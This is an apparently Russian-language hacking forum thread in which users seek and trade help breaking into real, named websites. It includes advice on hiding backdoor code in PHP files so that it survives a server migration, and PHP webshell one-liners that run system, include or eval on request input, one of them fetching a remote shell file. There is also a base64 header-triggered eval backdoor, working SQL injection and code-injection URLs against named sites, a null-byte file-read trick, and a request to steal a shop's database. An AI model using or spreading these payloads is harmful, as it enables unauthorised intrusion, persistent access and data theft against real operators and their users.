Здравствуйте! )) есть шелл на сервере (сервер 1), админы хотят перейти на сервер 2 и взять с собой туда лишь несколько PHP файлов. Подскажите, какой код нужно внедрить в PHP файлы, чтобы он был не сильно заметен, и потом через него можно было залить шелл уже на новом сервере? Спасибо!
вероятно в скрипте несколько sql-запросов с разным числом столбцов..а может еще что-то а вот здесь все просто Code: http://www.gamingtrend.com/Reviews/review/review.php?ReviewID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
Code: system($_GET['d']); или Code: include($_GET['s']); а потом site.ru/test.php?d=ls site.ru/test.php?s=http://www.google.com/shell.txt
http://raz0r.name/releases/mega-reliz-samyj-korotkij-shell/ тогда просто eval($_GET['c']); а потом уже разберешься, что отключено и как с этим бороться
может на сервере отключен register_globals? попробуй так: http://nkregion.kz/news2/plugins/wacko/highlight/html.php?text=%3C!--{${phpinfo()}}--%3E
да ..а есчё можно как у сплойта от СМФ Code: if(isset($_SERVER['HTTP_SHELL'])) { print otake;eval(base64_decode($_SERVER['HTTP_SHELL']));print otake;exit(); } а патом пасылать PHP: GET http://site.ru/index.php HTTP/1.0 Host: www.site.ru Prama: no-cache Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */* Shell: c3lzdGVtKCdscycpOw== Например так...
http://www.medicinenet.com/script/main/art.asp?articlekey=47344+and+1=@@version-- Error converting data type varchar to int как сделать чтоб типы совпали и я узнал версию?
значит версия двига в твоем случае отличается или стоит патч SQL-инъекция в хранимой процедуре: http://www.medicinenet.com/script/main/art.asp?articlekey=47344'-- К сожалению, не только подогнать тип данных не получится, но и вообще внедрить SQL-код.
что можно сделать, если я могу перемещаться по каталогам с помощью скрипта и просматривать текстовые файлы с помощью скрипта на сайте http://www.site/xxx/show.asp?doc=abc&dir=cba если в doc писать например show.asp то пишет "нет запрашиваемой страницы" если просто show то пишет " filename=bla\bla\bla\show.txt файл не найден"
Есть сервер: http://formz.ru/ Судя по заголовкам работает на Server: CherryPy/3.0.1 . Судя по всему, опять же, есть sql-inj: https://formz.ru/nb/public/faq/view?table.question_list.limit=[sql] У кого есть идеи по продолжению? Поиск уязвимостей сервера по гуглу ничего путнего не дал. И как можно определить какая БД установлена на сайте?
нуллбайтом отсечь расширение и читать любые файлы: http://www.site/xxx/show.asp?doc=abc&dir=cba.php%00
Здравствуйте я хотел бы поинтересоваться как можно стянуть базу контент интерне магазина ? она сохраняется в файле с росшерением .CSV Но как её вытянуть от туда немогу понять. http://www.sex-shop.ua/ Вот магазин помогите пожалуйста.
Да судя по ошибке так и есть Это судя по чему? Я не увидел, и даже если-бы она там была, это limit, скорее всего после order by, а это дохлый номер
Судя по тому, что другие параметры на сайте интвалятся, а этот выдает критическую ошибку, хотя конечно не факт. А вот про то что в лимит инъекция "дохлый номер" это ты совсем зря. Просто сервер БД видимо какой то редкий.
Вот инъекция в лимите http://www.contactphoto.com/archive.php?search=&limit=1 Сдесь обычный мускул, ошибка выплёвывает весь запрос, что упрощает дело. Если это возможно, хотелось бы увидить реализацию
